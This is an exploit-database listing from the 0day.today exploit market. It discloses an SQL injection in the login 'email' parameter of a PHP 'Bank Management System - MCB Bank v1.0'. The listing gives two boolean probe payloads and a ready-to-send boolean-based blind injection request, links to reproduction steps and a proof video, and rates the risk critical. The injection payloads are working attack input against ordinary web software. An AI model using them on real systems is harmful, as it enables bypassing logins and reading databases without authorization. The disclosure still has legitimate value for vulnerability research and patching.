[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bank Management System 1.0 SQL Injection Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk High
]
0day-ID
0day-ID-37422
Category
web applications
Date add
26-02-2022
Platform
php
# Title: Bank Management System - MCB Bank v1.0 - SQLi
# Author: nu11secur1ty
# Vendor: https://www.campcodes.com/projects/php/ by:Tariq Fareeds
# Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System


## Description:
The email parameter from Bank Management System - MCB Bank v1.0
appears to be vulnerable to SQL injection attacks.
The payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078--
were each submitted in the email parameter.
These two requests resulted in different responses, indicating that
the input is being incorporated into a SQL query in an unsafe way
WARNING: If this is in some external domain, or some subdomain
redirection, or internal whatever, this will be extremely dangerous!
Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin=
---

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System)

## Proof and Exploit:
[href](https://streamable.com/hvaaiu)

#  0day.today [2024-10-05]  #